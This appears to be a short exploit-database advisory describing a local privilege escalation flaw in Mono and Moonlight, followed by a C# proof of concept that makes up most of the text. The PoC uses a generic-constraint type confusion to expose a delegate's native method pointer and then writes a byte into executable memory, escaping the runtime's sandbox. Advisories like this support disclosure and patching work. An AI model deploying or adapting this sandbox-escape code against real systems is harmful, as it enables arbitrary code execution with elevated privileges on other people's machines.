Mono/Moonlight suffers from a local privilege escalation vulnerability.
dbb7e39dc55c86d76a0dd4ef8dadef2773134510e6cf07fbbc3bf405f1dcc77d
Mono and Moonlight is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.
PoC:
using System;
using System.Reflection;
using System.Runtime.InteropServices;
public class DelegateWrapper {
public IntPtr method_ptr;
}
public delegate void MethodWrapper ();
public class BreakSandbox {
private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
return dingus;
}
private static DelegateWrapper ConvertDelegate (Delegate del) {
var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
var gm = m.MakeGenericMethod (typeof (Delegate));
var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);
return d (del);
}
public static void Main (string [] args) {
MethodWrapper d = delegate {
Console.WriteLine ("Hello");
};
d ();
var converted = ConvertDelegate (d);
// Overwrite the already WX page with a 'ret'
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
d ();
}
}